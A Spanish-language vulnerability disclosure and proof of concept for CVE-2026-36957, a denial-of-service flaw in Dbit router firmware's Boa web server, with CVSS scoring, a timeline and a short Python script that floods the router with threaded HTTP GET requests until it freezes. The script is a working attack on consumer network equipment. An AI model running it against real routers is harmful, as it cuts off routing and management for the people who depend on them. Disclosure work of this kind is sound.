
Prueba de concepto para CVE-2026-36957, una vulnerabilidad de denegación de servicio en el firmware del router Dbit mediante una inundación HTTP sobre el servidor web Boa, que provoca el agotamiento de recursos y el bloqueo del sistema.
ID CVE: CVE-2026-36957 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: Shenzhen Dibit Network Equipment Co., Ltd. Producto: Router Dbit Versión de Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos No Controlado
El firmware V1.0.0 del Router Dbit es vulnerable a Denegación de Servicio a través del manejador de URI del servidor web Boa. Al enviar una inundación de alto volumen de solicitudes HTTP GET a URIs inexistentes, un atacante puede agotar recursos críticos del sistema, incluidos descriptores de archivo y buffers de memoria. Esto provoca un bloqueo del kernel o una congelación del sistema que desactiva el portal de gestión web y todas las capacidades de enrutamiento.
Puntuación CVSS v3.1: 7.5 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrica | Valor |
|---|
| Vector de Ataque | Red |
| Complejidad de Ataque | Baja |
| Privilegios Requeridos | Ninguno |
| Interacción del Usuario | Ninguna |
| Impacto de Confidencialidad | Ninguno |
| Impacto de Integridad | Ninguno |
| Impacto de Disponibilidad | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Comportamiento Esperado: El servidor debería limitar las conexiones y permanecer estable. Comportamiento Real: La interfaz web del router deja de responder; se requiere un reinicio manual.
| Fecha | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidad descubierta |
| 2026-04-29 | Reportada a MITRE |
| 2026-04-29 | CVE-2026-36957 asignado |
| 2026-04-29 | Divulgación pública |